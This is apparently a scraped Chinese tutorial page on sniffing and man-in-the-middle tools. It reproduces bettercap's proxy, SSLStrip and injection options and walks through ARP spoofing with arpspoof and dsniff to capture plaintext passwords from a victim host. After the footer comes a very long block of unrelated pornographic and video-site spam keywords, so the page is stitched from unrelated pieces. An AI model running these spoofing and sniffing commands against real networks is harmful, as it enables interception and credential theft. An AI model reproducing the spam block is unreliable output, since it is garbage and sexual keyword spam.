sniffer to use this BPF filter ( will enable sniffer ).-P, --parsers PARSERS            Comma separated list of packet parsers to enable, '*' for all ( NOTE: Will set -X to true ), available: POST, PGSQL, IRC, MPD, REDIS, URL, WHATSAPP, SNMP, COOKIE, DICT, MYSQL, TEAMVIEWER, MAIL, SNPP, HTTPS, HTTPAUTH, NTLMSS, FTP, DHCP, RLOGIN, NNTP - default: *--disable-parsers PARSERS    Comma separated list of packet parsers to disable ( NOTE: Will set -X to true )--custom-parser EXPRESSION   Use a custom regular expression in order to capture and show sniffed data ( NOTE: Will set -X to true ).代理選項:TCP:--tcp-proxy                  啟用 TCP 代理 ( requires other --tcp-proxy-* options to be specified ).--tcp-proxy-module MODULE    Ruby TCP proxy module to load.--tcp-proxy-port PORT        Set local TCP proxy port, default to 2222 .--tcp-proxy-upstream ADDRESS:PORTSet TCP proxy upstream server address and port.--tcp-proxy-upstream-address ADDRESSSet TCP proxy upstream server address.--tcp-proxy-upstream-port PORTSet TCP proxy upstream server port.UDP:--udp-proxy                  啟用 UDP 代理 ( requires other --udp-proxy-* options to be specified ).--udp-proxy-module MODULE    Ruby UDP proxy module to load.--udp-proxy-port PORT        Set local UDP proxy port, default to 3333 .--udp-proxy-upstream ADDRESS:PORTSet UDP proxy upstream server address and port.--udp-proxy-upstream-address ADDRESSSet UDP proxy upstream server address.--udp-proxy-upstream-port PORTSet UDP proxy upstream server port.HTTP:--proxy                      Enable HTTP proxy and redirects all HTTP requests to it, default to false.--proxy-port PORT            Set HTTP proxy port, default to 8080.--allow-local-connections    Allow direct connections to the proxy instance, default to false.--no-sslstrip                Disable SSLStrip.--log-http-response          Log HTTP responses.--no-http-logs               Suppress HTTP requests and responses logs.--proxy-module MODULE        Ruby proxy module to load, either a custom file or one of the following: injectcss, injectjs, redirect, injecthtml.--http-ports PORT1,PORT2     Comma separated list of HTTP ports to redirect to the proxy, default to 80.--proxy-upstream-address ADDRESSIf set, only requests coming from this server address will be redirected to the HTTP/HTTPS proxies.HTTPS:--proxy-https                Enable HTTPS proxy and redirects all HTTPS requests to it, default to false.--proxy-https-port PORT      Set HTTPS proxy port, default to 8083.--proxy-pem FILE             Use a custom PEM CA certificate file for the HTTPS proxy, default to /root/.bettercap/bettercap-ca.pem .--https-ports PORT1,PORT2    Comma separated list of HTTPS ports to redirect to the proxy, default to 443.CUSTOM:--custom-proxy ADDRESS       Use a custom HTTP upstream proxy instead of the builtin one.--custom-proxy-port PORT     Specify a port for the custom HTTP upstream proxy, default to 8080.--custom-https-proxy ADDRESS Use a custom HTTPS upstream proxy instead of the builtin one.--custom-https-proxy-port PORTSpecify a port for the custom HTTPS upstream proxy, default to 8083.--custom-redirection RULE    Apply a custom port redirection, the format of the rule is PROTOCOL ORIGINAL_PORT NEW_PORT. For instance TCP 21 2100 will redirect all TCP traffic going to port 21, to port 2100.服務器選項:--httpd                      Enable HTTP server, default to false.--httpd-port PORT            Set HTTP server port, default to 8081.--httpd-path PATH            Set HTTP server path, default to ./ .--dns FILE                   Enable DNS server and use this file as a hosts resolution table.--dns-port PORT              Set DNS server port, default to 5300.

事實上你使用的不僅僅是一款工具,或許還會使用到arpspoof進行Arp欺騙,mitmproxy攔截HTTP內容并注入你的payload等等。對于我來說,我很討厭進行一項簡單的攻擊卻需要使用一大堆的工具來進行操作。

?

Cain

Cain,這個Windows用戶會覺得很好用。總之,它功能強大,操作簡單。如果你喜歡漂亮的圖形界面,Cain就是你很好的選擇之一。它不像Ettercap那么多選項,但是很酷也有很多Windows附加功能。

?

Driftnet

還有為了查看特定內容的專門的嗅探器。Driftnet 能夠分析出人們上網看到的圖片。

?

?

使用 Dsniff 和 Ettercap 快速演示 ARP 欺騙

? ? ? ? 在現代的局域網當中,交換式局域網是主流,廣播式的局域網已經或者不在存在,以前要嗅探局域網絡上傳輸的信息只需將網卡設置為混合模式,通過捕獲數據包的軟件,就可以截取。現在交換式以太網或者局域網中,交換機通過查看路由表(不嚴格的說法)發送信息。要想截獲兩臺主機中傳遞的信息可以通過 arp 欺騙獲得。

在linux下使用arpspoof和dsniff欺騙的操作如下

首先打開linux自帶的路由轉發功能
編輯 /proc/sys/net/ipv4/ip-forward 文件
echo 1 > /proc/sys/net/ipv4/ip-forward打開 arpspoof
arpspoof -t 你要欺騙的主機ip地址 網關ip地址(這里你可以定向的你想要的ip地址) &(在后臺運行)打開 dsniff
使用默認的捕獲表
dsniff -c -f /usr/share/dsniff/dsniff.services (當然這里你可以自己定制需要捕獲端口的規則)
具體寫法可以 cat /usr/share/dsniff/dsniff.services 查看編寫的規則 首先你應該確定包轉發已經開啟,不然我們的機器會丟棄所有我們想要嗅探的主機之間的傳輸,導致服務無響應。
我用的一些工具會自動進行這項工作(比如Ettercap),但是保險起見,你也許會希望自己來做這件事。
根據操作系統的不同,你可以使用如下的命令:
Linux:
echo 1 > /proc/sys/net/ipv4/ip_forward
BSD:
sysctl -w net.inet.ip.forwarding=1
現在你的計算機將會轉發所有的傳輸,現在你可以開始ARP欺騙了。如果想要嗅探一個主機和網關之間的所有傳輸,并查看它發送到網絡上的雙向傳輸的所有數據。
可以使用如下2個命令行:
arpspoof -t 192.168.1.1 192.168.1.2 & >/dev/null 
arpspoof -t 192.168.1.2 192.168.1.1 & >/dev/null“& >/dev/nul”部分是為了使它在終端運行起來更容易,但是為了debug,你可能想要忽略它。現在你可以使用你想要的任何套件來嗅探連接。新手的話,我推薦使用Dsniff,它支持ARPspoof來嗅探純文本密碼。
用Dsniff開始嗅探,你只需退出到命令窗口并輸入:dsniff
Dsniff找到用戶名和密碼后,它會將它們顯示在屏幕上。
如果你想要查看所有其他傳輸,我推薦你使用TCPDump或者 Wireshark。如果想要停止ARP欺騙,輸入如下命令:
killall arpspoof
這會關閉上面啟動的2個 Arpspoof。

?

?

?

總結

以上是生活随笔為你收集整理的dsniff 和 Ettercap 和 bettercap 详解 - 网络嗅探工具包的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

久久伊人操 | 久久久久久99精品 | 日韩久久一区二区 | 国产精品1区2区3区在线观看 | 久久九九影视网 | 精品国产自在精品国产精野外直播 | 亚洲精品女人久久久 | 中文字幕在线观看日本 | 亚洲国产网站 | 免费在线成人 | 西西4444www大胆视频 | 精品久久久久免费极品大片 | 视频99爱| 日本精品视频在线观看 | 国产精品麻豆视频 | 狠狠色丁香婷综合久久 | 青青草国产成人99久久 | 成人观看| 99精品国产成人一区二区 | 首页av在线| 日韩久久久 | 亚洲激情电影在线 | 精品欧美一区二区三区久久久 | 亚洲理论在线 | 韩日av一区二区 | 久久免费试看 | 97小视频 | 国产精品亚洲成人 | 国内精品久久影院 | 日操干| 亚洲首页| 99性视频 | 国产无遮挡又黄又爽在线观看 | 婷婷色站 | www九九热 | 一性一交视频 | 91中文字幕视频 | 狠狠久久婷婷 | 91精品国产欧美一区二区成人 | 精品国产免费一区二区三区五区 | 狠狠久久综合 | 亚洲精品中文字幕视频 | 日本视频精品 | 日韩电影一区二区在线 | 丁香婷婷在线观看 | 亚洲精品中文在线资源 | 久久婷婷精品 | 丝袜护士aⅴ在线白丝护士 天天综合精品 | 婷婷亚洲五月色综合 | 国产精品久久久久久久久久东京 | 欧美日韩91 | 久久免费看a级毛毛片 | a午夜在线 | 女人高潮一级片 | 中国一区二区视频 | 国产麻豆精品传媒av国产下载 | 福利视频导航网址 | 久久伊人热 | 色av资源网 | 国产精品久久电影观看 | 麻豆网站免费观看 | 久久免费视频国产 | 在线观看视频免费大全 | 免费观看国产精品 | 少妇搡bbbb搡bbb搡aa | 婷婷久操 | 久久精品一区八戒影视 | 国产色网站 | 国产精品久久久久久五月尺 | 青青五月天 | 在线看片日韩 | 午夜色大片在线观看 | 涩五月婷婷| 久久刺激视频 | 美女黄频视频大全 | 成人在线观看你懂的 | 黄色日本免费 | 日本99精品 | 欧美日韩国产综合网 | 亚洲区另类春色综合小说校园片 | 日韩欧美99 | 日韩久久在线 | 日韩高清精品免费观看 | 激情欧美xxxx| 亚洲免费小视频 | 婷婷在线综合 | 91av官网 | 青草视频在线免费 | 欧美精品久久久久久久 | 国产精品国产自产拍高清av | 日韩免费三区 | 国内精品久久久久久久久久清纯 | 日韩精品一区二区三区在线播放 | 国产免费亚洲高清 | 国产精品精| 99久久精品国产观看 | 国产美女精彩久久 | 国产大陆亚洲精品国产 | 国产精品一区在线播放 | 欧美成人a在线 | 91少妇精拍在线播放 | 在线免费试看 | av黄色av| 一区二区视频在线播放 | 免费看黄20分钟 | 精品久久久久久久久久久久久久久久 | 天天操天天操天天 | 久久99热久久99精品 | 国产精品九九九九九九 | 69国产精品视频免费观看 | 久久久国产毛片 | 日本久久精| 99在线国产 | www.天天射 | 在线观看第一页 | 黄色三级视频片 | 韩国一区在线 | 国产精品美女久久久久久久久久久 | 久久毛片高清国产 | 免费日韩 | 日韩一级片网址 | 久久久久激情电影 | 天天综合精品 | 婷婷综合网 | 久久一级电影 | 亚洲三级在线播放 | 久草视频在线新免费 | 中文免费 | 99麻豆久久久国产精品免费 | 中文字幕免费高清av | 欧美一区二区日韩一区二区 | 日本爱爱免费视频 | 黄色官网在线观看 | 成人av一区二区兰花在线播放 | 午夜精品久久久久久久99水蜜桃 | 亚洲国产wwwccc36天堂 | 免费亚洲视频 | 国产69精品久久99不卡的观看体验 | 中文字幕日本电影 | 福利视频区 | 久久综合狠狠 | 免费视频黄色 | 99久久99视频| 顶级bbw搡bbbb搡bbbb | 亚洲欧洲成人精品av97 | 国产乱码精品一区二区蜜臀 | 日韩欧美视频二区 | 在线成人国产 | www色av| 免费在线观看国产精品 | 日日干网址 | 99在线精品免费视频九九视 | 狠狠地操 | 国产精品99久久久久人中文网介绍 | 国产成人一区二区三区久久精品 | 国产在线欧美日韩 | wwwwww黄| 日韩 在线 | 国产精品高潮在线观看 | 亚洲aⅴ在线观看 | 免费观看mv大片高清 | 日本午夜在线亚洲.国产 | 国产在线精品区 | 亚洲一区日韩在线 | 天天综合在线观看 | 精品二区久久 | 日韩精品不卡在线观看 | 欧美日韩视频一区二区三区 | 国产黄色精品视频 | 亚洲国产一区在线观看 | 天天草天天草 | 伊人黄色网 | 日日夜夜中文字幕 | 人人爽人人射 | 精品在线观看一区二区三区 | 91.dizhi永久地址最新 | 国产污视频在线观看 | 深爱激情五月综合 | 九九久久精品 | 一二区电影 | 国产精品热 | 久久五月婷婷丁香 | 国产成人av免费在线观看 | 国产高清视频免费 | www国产亚洲精品久久网站 | 在线观看国产永久免费视频 | 一区三区视频在线观看 | 欧美另类美少妇69xxxx | 久久综合影视 | 91视频午夜| 欧美精品久久久久久久亚洲调教 | 久草精品视频 | 成人免费观看a | 黄色福利网 | 特黄免费av | 天天干天天操天天爱 | 天天草天天摸 | 欧美性色网站 | 国产区精品 | 日韩一区二区三区高清免费看看 | 中文字幕免费不卡视频 | 超碰97人人干 | 亚洲精品久久久久久久不卡四虎 | 91视频在线网址 | 97网在线观看| 久久久午夜精品理论片中文字幕 | 久久99国产视频 | 中国精品少妇 | 免费网站v | 不卡av免费在线观看 | 久久观看最新视频 | 久久国产精品久久久 | 日韩精品在线一区 | 日韩网站免费观看 | 狠狠躁夜夜a产精品视频 | 久久免费黄色网址 | 国产一区免费视频 | 欧美精品一区二区蜜臀亚洲 | 午夜黄色影院 | 精品亚洲免a | 四虎亚洲精品 | 在线成人av | 中文字幕专区高清在线观看 | www91在线| 午夜精品一区二区三区在线 | 探花系列在线 | 精品视频在线播放 | 日韩www在线 | 美女视频黄的免费的 | 免费三及片 | 国产在线2020| 国产精品久久久久国产精品日日 | av在线一二三区 | 久久免费视频国产 | 中文字幕精品三级久久久 | 91爱爱免费观看 | 久草视频在线观 | 成人亚洲综合 | 中文字幕亚洲综合久久五月天色无吗'' | 五月婷婷开心中文字幕 | 亚洲一区久久久 | 日韩精品一区二 | a√天堂中文在线 | 亚洲乱码精品久久久 | 亚洲精选国产 | 97在线免费观看 | 九九九国产 | 国产一级片直播 | 午夜三级影院 | 国产成人一区二区三区久久精品 | 欧美人体xx | 超级碰碰碰免费视频 | 欧美日韩视频网站 | 国产精品久久久久久模特 | 日韩高清www | 国产美女无遮挡永久免费 | 综合激情伊人 | 成人在线播放网站 | 91你懂的 | 日本九九视频 | 精品国产一区二区三区在线 | 天天爽天天爽天天爽 | 婷婷丁香花五月天 | 国产传媒一区在线 | 最新日本中文字幕 | 超碰在线人人艹 | 91传媒91久久久 | 日韩精品免费专区 | 夜夜操天天干, | 激情五月看片 | 国产一级在线看 | 深夜免费小视频 | 久久天天操 | 亚洲区另类春色综合小说 | 日日骑| 91成人精品国产刺激国语对白 | 欧美成年黄网站色视频 | 91伊人| 天天干天天拍天天操天天拍 | 久久久久亚洲精品 | 欧美视频日韩 | 欧美精品乱码久久久久久 | 天天插一插| 国产精品第二十页 | 久久高清国产 | 免费黄色激情视频 | 偷拍精偷拍精品欧洲亚洲网站 | 国产一区视频在线观看免费 | 久久久久久久网 | 亚洲欧美国产精品久久久久 | 色婷av | 久久精品999| 在线小视频 | 欧美怡红院视频 | 久久婷婷丁香 | 日韩av视屏 | 爱爱av网| 天天干夜夜干 | 久久国产精品久久久久 | 免费在线观看av网址 | 91久久国产自产拍夜夜嗨 | 一区二区三区四区久久 | 日韩中文字幕第一页 | 成人黄色在线 | 96久久欧美麻豆网站 | 夜夜爽夜夜操 | 久久久国产精品一区二区中文 | 婷婷综合久久 | 91超碰免费在线 | 不卡精品 | 99视频免费播放 | 日韩网站中文字幕 | 成人在线观看免费 | 91人人网| 国产xx在线 | www.天天操.com | 国产精品美女视频网站 | 99精品视频在线看 | 美女黄频| 美女视频一区 | 手机看国产毛片 | 永久免费毛片在线观看 | 久久国产精品偷 | 国产精品久久久久三级 | 久久国产剧场电影 | 国产精品成人自产拍在线观看 | 黄色成人在线 | 91免费版在线观看 | 久久综合精品一区 | 免费色视频网址 | 久久永久视频 | 国产亚洲免费的视频看 | 亚洲精品午夜一区人人爽 | 久草视频免费看 | 中文字幕在线中文 | 亚洲不卡123 | 91中文字幕在线观看 | 日韩欧在线 | 久久免费视频播放 | 四虎成人免费影院 | av福利网址导航大全 | 国产自偷自拍 | 超碰999 | 美女黄频在线观看 | 久久久黄视频 | 国产精品国产三级国产aⅴ入口 | 中文字幕日韩在线播放 | 亚洲精品国产麻豆 | 国产中文在线观看 | a视频免费在线观看 | 在线观看视频三级 | 天天射天天操天天干 | 国产精品大片免费观看 | 在线看国产一区 | 国产精品女人久久久久久 | 久久久精品欧美一区二区免费 | 激情婷婷色 | 九色精品免费永久在线 | 中国一级片在线播放 | 一区二区久久久久 | 成人av日韩| 涩涩网站在线观看 | 日韩久久电影 | 国产成人一区二区三区在线观看 | 粉嫩av一区二区三区四区在线观看 | 色婷婷在线视频 | 色多多污污在线观看 | 精品国产一区二区三区不卡 | 日韩视频三区 | 99久久99久久精品 | 中文字幕91在线 | 精品国产99 | 99久高清在线观看视频99精品热在线观看视频 | 日日夜夜精品免费 | 免费日韩三级 | 黄色在线免费观看网址 | av在线免费播放网站 | 国产啊v在线观看 | 狠狠色噜噜狠狠 | 亚洲精品午夜国产va久久成人 | 超碰资源在线 | 成人h视频在线 | 91福利区一区二区三区 | 亚洲黄色片| 不卡的一区二区三区 | 免费中文字幕视频 | 超碰97在线资源站 | 亚洲成av人片在线观看香蕉 | 色婷婷av在线 | 91麻豆国产| 欧美一级日韩三级 | 日韩欧美在线综合网 | 婷婷日日 | 日韩a级黄色 | 91精品专区 | 毛片在线播放网址 | 视频福利在线 | 国产97视频 | 天天看天天操 | a在线免费观看视频 | 91视频在线免费观看 | 99精品国产99久久久久久97 | 日韩久久影院 | 国产色啪 | 99免在线观看免费视频高清 | 欧美性大战| 999视频在线观看 | 免费亚洲黄色 | 91精选 | 免费看黄视频 | 天天激情在线 | 久久婷婷精品视频 | 日韩精品一区二区三区在线播放 | 亚洲第一色 | 日韩欧美国产精品 | 国产精品免费麻豆入口 | 超碰大片 | 久久久久久久久久久福利 | 亚州av一区 | 永久免费的av电影 | 成人av免费看 | 天天干夜夜操视频 | 精品久久久久久久久久岛国gif | 五月天天av | 欧美日韩国产网站 | 国产精品久久久久久久久久免费看 | 五月激情丁香婷婷 | 国产精品99免费看 | 国产在线看 | 国产福利av在线 | 午夜精品久久久久99热app | 日本精品中文字幕 | 亚洲伊人第一页 | 五月综合网站 | 三上悠亚一区二区在线观看 | 成人午夜免费剧场 | av大全在线 | 久久五月婷婷丁香社区 | 国产1区2区3区在线 亚洲自拍偷拍色图 | 国产99久久精品一区二区300 | 91麻豆国产 | www.久久色 | 色婷婷免费 | 天堂在线一区二区三区 | 又色又爽又黄高潮的免费视频 | 亚洲视频99 | 在线观看中文av | 国产成人精品在线观看 | 成人日批视频 | 国产剧情一区二区 | 综合色伊人 | 激情综合网天天干 | 欧美久草网| 久久久精选 | 日韩av资源在线观看 | 狠狠躁夜夜躁人人爽超碰91 | 欧美高清视频不卡网 | 日韩一区二区三免费高清在线观看 | 97色se| 黄色av电影在线观看 | 欧美性色网站 | 国产不卡一区二区视频 | 久久午夜影视 | 国内久久视频 | 成人在线免费视频观看 | 成人wwwxxx视频 | 欧美另类v| 狠狠夜夜 | 丝袜+亚洲+另类+欧美+变态 | 国产精品涩涩屋www在线观看 | 蜜臀av性久久久久蜜臀av | 天天激情天天干 | 午夜精品久久久久久久99婷婷 | 国产在线观看免 | 伊人永久| 欧美日韩精品免费观看 | 国产一级片在线播放 | 国产精品涩涩屋www在线观看 | 色偷偷88888欧美精品久久久 | 麻花豆传媒mv在线观看 | 九九九在线 | 视频三区 | 国产精品自在欧美一区 | 国产精品视频专区 | 国产色啪 | 日韩一级理论片 | 久久9视频| 国产a精品 | 精品欧美乱码久久久久久 | 国产永久免费高清在线观看视频 | 国产日产精品一区二区三区四区 | 97在线公开视频 | 欧美激情片在线观看 | 九九免费精品视频 | 久久综合久久鬼 | 国产网站色 | av大全在线免费观看 | 午夜精品福利一区二区三区蜜桃 | 有码视频在线观看 | 免费在线观看亚洲视频 | 国产毛片在线 | 精品久久久久久亚洲综合网站 | 91专区在线观看 | 91在线播放综合 | 最新av在线播放 | 午夜黄色大片 | 久久香蕉影视 | 日韩欧美在线中文字幕 | 亚洲婷婷在线视频 | 成人av网站在线播放 | 日韩动漫免费观看高清完整版在线观看 | 青青草在久久免费久久免费 | 国产一级精品在线观看 | 国产一级不卡毛片 | 欧美激情综合色综合啪啪五月 | 国精产品满18岁在线 | 欧美做受xxx| 日韩av片免费在线观看 | 婷婷色中文网 | 操夜夜操 | 免费观看的av | 一级黄色片毛片 | 视色网站 | www国产精品com| 久久国产一区二区 | 国内精品久久久久影院一蜜桃 | 亚洲性xxxx| 久久久免费电影 | 婷婷色网站 | av中文字幕免费在线观看 | 久久五月婷婷丁香 | 国内视频一区二区 | 毛片99 | 999热视频 | 日韩在线精品视频 | 日韩理论片 | 久久久精品一区二区三区 | 亚洲欧美久久 | 99性视频| 超碰久热 | 国产精品久久久久久超碰 | 亚洲综合精品视频 | 99久久99热这里只有精品 | 天天插日日射 | 婷婷伊人网 | 国产成人精品午夜在线播放 | 99操视频 | 九九免费观看全部免费视频 | 婷婷精品国产一区二区三区日韩 | 欧美a在线免费观看 | 激情片av | 色综合久久精品 | 日韩免费电影一区二区三区 | 91人网站 | 久久综合久久综合九色 | 在线一区观看 | 婷婷婷国产在线视频 | www.玖玖玖| 日日操日日插 | 欧美一区二区三区四区夜夜大片 | 18+视频网站链接 | 亚洲一区二区三区miaa149 | 欧美亚洲一区二区在线 | 成年人在线免费看片 | 久久久久久久久久久久av | 97偷拍在线视频 | 精品国产电影 | 成人 国产 在线 | 五月婷婷av | 国产热re99久久6国产精品 | 最新色视频 | 丁香五月亚洲综合在线 | 丁香婷婷色| 精品伦理一区二区三区 | 亚洲h色精品 | 人人玩人人添人人 | 国产成人免费精品 | 婷婷看片 | 97精品国产91久久久久久 | 激情小说网站亚洲综合网 | 久草网视频在线观看 | 在线免费亚洲 | 五月激情站 | 国产精品麻豆视频 | 欧日韩在线视频 | 中文成人字幕 | 欧美另类z0zx | 日韩中文字幕a | 亚洲精品高清在线观看 | 亚洲国产精品va在线看黑人 | 欧美精品一区二区免费 | 91中文在线视频 | 国产色拍拍拍拍在线精品 | 欧美日韩国产高清视频 | 久久人人爽人人爽 | 97精品国自产拍在线观看 | 777奇米四色 | 国产va在线 | 五月婷婷婷婷婷 | 97精品免费视频 | av再线观看 | 黄色一级大片在线观看 | 成 人 黄 色 免费播放 | 久久精品5| 婷婷网站天天婷婷网站 | 日韩中文字幕免费在线播放 | 69夜色精品国产69乱 | 亚洲国产福利视频 | 干狠狠| 成人黄色片免费看 | 狠狠做六月爱婷婷综合aⅴ 日本高清免费中文字幕 | 成人久久免费视频 | 日韩三级一区 | 午夜电影av| 色噜噜日韩精品欧美一区二区 | 中文字幕在线观看第一区 | 日日麻批40分钟视频免费观看 | 久久九九免费 | 色av资源网 | 二区三区在线观看 | 久久99电影 | 亚洲一区 影院 | 精品一区二区在线播放 | 天天插视频 | 久久99国产精品久久99 | 欧美另类交在线观看 | 久久精品日产第一区二区三区乱码 | 91热视频| 91精品久久久久久久久久久久久 | 免费99精品国产自在在线 | a黄色大片| 国产中文字幕大全 | 天天亚洲综合 | 国产亚洲人成网站在线观看 | 在线观看黄色大片 | 激情xxxx | 久久久三级视频 | 国产黄视频在线观看 | 久久久久欧美精品 | 亚洲精品综合一二三区在线观看 | 九九有精品 | 久久久国际精品 | 日韩大片在线播放 | av免费在线观看1 | 丁香5月婷婷 | 亚洲a在线观看 | 国产精品福利午夜在线观看 | 久久久精品国产免费观看同学 | 婷婷激情站 | 狠狠色丁香婷婷综合橹88 | 中文字幕一区二区三 | 免费看一级片 | 中文字幕专区高清在线观看 | 91精品在线观看入口 | 一区二区精品 | 日本xxxxav | 91色一区二区三区 | 亚洲精品一区中文字幕乱码 | 国产色综合天天综合网 | 日本一区二区高清不卡 | 国产精品第二十页 | 丁香花五月 | 奇米先锋 | 久久久鲁 | 国产亚洲精品久久久久动 | 精品视频不卡 | 国产精选在线观看 | 国产精品网址在线观看 | 国产精品视频99 | 最近2019中文免费高清视频观看www99 | 国产成人精品av | av中文字幕电影 | 视频99爱| 在线中文字母电影观看 | 免费看日韩片 | 国产精品第三页 | 狠狠操狠狠操 | 亚州av一区 | 国产资源在线播放 | 激情片av | 欧美先锋影音 | 天堂av最新网址 | 久久观看免费视频 | 国产精品大片免费观看 | 99国产一区二区三精品乱码 | 黄色网在线免费观看 | 亚洲人精品午夜 | 欧美日韩二区三区 | 亚洲网站在线 | 五月婷婷综 | 成人超碰在线 | 日日夜夜狠狠操 | 亚洲精品国产片 | 国产高清黄 | 免费久久99精品国产 | 亚洲成人av在线播放 | 在线成人中文字幕 | 日韩在线观看网站 | 五月婷婷中文网 | 久草在线网址 | 九九热在线视频 | 伊人中文字幕在线 | 亚洲天堂自拍视频 | 在线观看免费福利 | 国产精品免费一区二区 | 国产精品日韩在线播放 | 伊人天天干 | 日韩精品无 | 久久av在线播放 | 天天骚夜夜操 | 五月婷婷久久综合 | 国产精品亚洲片在线播放 | 日韩av片无码一区二区不卡电影 | 国产黄a三级三级 | 欧美精品xx | 黄色看片 | 久久婷婷色综合 | 国产小视频国产精品 | 精品视频 | 日韩高清观看 | 亚洲视频免费在线 | 亚洲另类交 | 日韩在线视频网 | 亚洲精品女人久久久 | 人人cao| 精品国产一区二区三区av性色 | 99热精品国产 | 91麻豆免费版 | 六月丁香激情综合色啪小说 | 综合网在线视频 | 91麻豆精品国产 | 亚洲精品免费在线播放 | 在线精品观看国产 | 在线99 | 亚洲作爱| 黄色免费网站大全 | 美女黄网站视频免费 | 日韩精品视频免费看 | 国产在线观看国语版免费 | 91看毛片 | www.干| 亚洲天堂网在线视频观看 | 国产精品一区二区免费 | 99精品免费观看 | 麻豆视频91 | 狠狠色噜噜狠狠狠狠2021天天 | 99精品国产亚洲 | 人人舔人人 | 日本精品视频在线观看 | 四虎精品成人免费网站 | 天天操天天射天天舔 | 特级免费毛片 | 中文字幕资源在线观看 | 国产高清视频在线播放 | 亚洲视频久久久 | 人人天天夜夜 | 国产区av在线 | 精品久久久久久久久久 | 亚洲另类人人澡 | 91成人精品一区在线播放 | 91精品啪啪 | 亚洲综合成人婷婷小说 | 国产成人黄色 | 色网站黄 | 成人免费观看视频大全 | 成人免费看片98欧美 | 精品久久久久久亚洲综合网 | 亚洲精品女人 | 在线免费观看av网站 | 四虎国产免费 | 天天天综合| 免费男女羞羞的视频网站中文字幕 | 91在线视频在线观看 | 成人a v视频| 日韩视频专区 | 婷婷网在线 | 99久久精品国产观看 | 全久久久久久久久久久电影 | 激情久久久久久久久久久久久久久久 | 999热视频 | 国产精品a成v人在线播放 | 在线一二三区 | 97人人模人人爽人人喊网 | 欧美一级淫片videoshd | 国产精品免费麻豆入口 | 亚洲在线高清 | 福利视频导航网址 | 国产精品热视频 | 免费看的av片 | 国产精品一区免费观看 | 香蕉在线视频播放网站 | 在线免费观看黄色 | 久久成人18免费网站 | 涩涩网站在线播放 | 国产经典av | 91看国产| 免费看黄在线看 | 欧美淫aaa免费观看 日韩激情免费视频 | 精品国产乱码 | 亚洲精品88欧美一区二区 | a级黄色片视频 | 日韩免费在线视频观看 | 国产打女人屁股调教97 | 91在线精品一区二区 | 久久人人爽人人片 | 欧美精品一区二区蜜臀亚洲 | 91免费高清在线观看 | 久久精品第一页 | 成人午夜免费剧场 | 狠狠色丁香婷婷综合久小说久 | 99视频精品全部免费 在线 | 91久久一区二区 | 精品国产一区二区三区免费 | 国产精国产精品 | 久久精品三 | 99久精品 | 久久精品99国产精品 | 插久久 | 激情久久五月 | 欧美色久 | 黄色一级大片在线观看 | 中文字幕 欧美性 | 在线精品在线 | 91尤物在线播放 | 免费日韩一级片 | 99精品国产aⅴ| 成人国产一区二区 | 亚洲精品视频在线观看免费 | 91成人在线观看高潮 | 精品999国产| 麻豆精品视频在线观看免费 | www久草 | 中文在线资源 | 国产美女免费观看 | 日本特黄一级片 | 久久综合色播五月 | 手机av电影在线观看 | 国产丝袜 | www激情com | 97免费中文视频在线观看 | av大片网址 | 中文字幕一区三区 | 黄色片网站av | 热久久国产 | 激情xxxx| 免费av在线网 | av午夜电影 | 日韩免费电影网站 | 免费高清在线观看成人 | 国产+日韩欧美 | 精品一区二区免费 | 天天操天天射天天 | 欧美日本啪啪无遮挡网站 | 亚洲专区欧美专区 | 午夜电影一区 | 免费视频一级片 | 中文字幕一区在线 | 在线免费观看av网站 | 成人黄色在线 | 国产69精品久久app免费版 | 国产精品久久综合 | 久草视频手机在线 | 亚洲va天堂va欧美ⅴa在线 | 麻豆久久精品 | 婷婷国产v亚洲v欧美久久 | 国产精品久久久久av | 五月丁婷婷| 国产高清久久久久 | 国产成人精品久久 | 国产一级在线播放 | 中文字幕一区二区三区精华液 | 一色av| 免费在线观看av网址 | 欧美精品一区二区免费 | 中文字幕在线高清 | 欧美男女爱爱视频 | 操天天操 | 一区二区三区www | 国产美女搞久久 | 欧美日韩国产色综合一二三四 | 婷婷丁香九月 | 五月婷婷丁香激情 | 欧美一级片免费观看 | 天天操夜夜叫 | 久久电影网站中文字幕 | 中文字幕中文字幕 | 久久超 | 久久这里有精品 | 欧美精品一区二区性色 | 久久久久久久久久亚洲精品 | 国产精品激情偷乱一区二区∴ | 国产aa精品 | 成人在线小视频 | 日韩欧美国产精品 | 欧美日本日韩aⅴ在线视频 插插插色综合 | 高清中文字幕av | 青春草免费视频 | 欧美日韩精品在线免费观看 | 黄色的视频网站 | 欧美人人 | 国产精品18久久久久久久 | 久久xx视频 | 精品欧美一区二区在线观看 | 亚洲美女视频网 | 国产日韩精品欧美 | 中文字幕免费观看 | 人人爽人人插 | 国产高清不卡一区二区三区 | 日韩免费电影 | 日本久久综合网 | a在线播放 | 日韩视频一区二区 | 国产精品自产拍在线观看中文 | 人人网av| 可以免费看av | 国产一级三级 | 69久久99精品久久久久婷婷 | 亚洲欧美国内爽妇网 | 日韩国产精品久久久久久亚洲 | 欧美日韩视频在线一区 | 在线激情av电影 | 国产精品高清一区二区三区 | 日韩精选在线观看 | 一级片色播影院 | 手机在线小视频 | 国产中文字幕在线 | 6080yy精品一区二区三区 | 天天干天天色2020 | 天天摸天天舔天天操 | 国产精品免费一区二区三区 | 国内精品久久久久久久影视麻豆 | 天天爱天天操 | 欧美亚洲免费在线一区 | 在线精品亚洲 | 91视频麻豆视频 | 日韩欧美高清不卡 | 69国产在线观看 | 最新三级在线 | 色综合天天色综合 | 在线观看免费成人av | 国产日韩精品在线观看 | 亚洲精品成人在线 | 久久久国产精品一区二区中文 | 亚州精品天堂中文字幕 | 日韩乱码中文字幕 | 亚洲精品在线一区二区三区 | 久久国产精品久久久久 | 在线观看免费版高清版 | 久久视频精品在线观看 | 成人国产精品入口 | 91av在线免费视频 | 天天射,天天干 | 五月综合激情婷婷 | 毛片a级片| 国产明星视频三级a三级点| 久久视频这里有久久精品视频11 | 精品亚洲一区二区三区 | 丁香五月亚洲综合在线 | 欧美伦理一区 | 777久久久 | 国产精品12345 | 久久国精品 | 国产啊v在线观看 | 三上悠亚一区二区在线观看 | 九色91av| 中文字幕 91 | 亚洲1区 在线 | 欧美色综合天天久久综合精品 | 日韩在线大片 | 最近中文字幕在线播放 | 天天干天天操天天爱 | 久久黄色小说视频 | 亚洲最新av在线网址 | 国产精品黑丝在线观看 | 精品1区2区| 久久综合99| 九九热只有这里有精品 | 在线黄网站 | 最新高清无码专区 | 在线观看亚洲免费视频 | 久久国产精品免费一区二区三区 | 视频在线观看91 | 91 在线视频播放 | 国产专区视频在线 | 在线观看视频精品 | 欧美性另类| 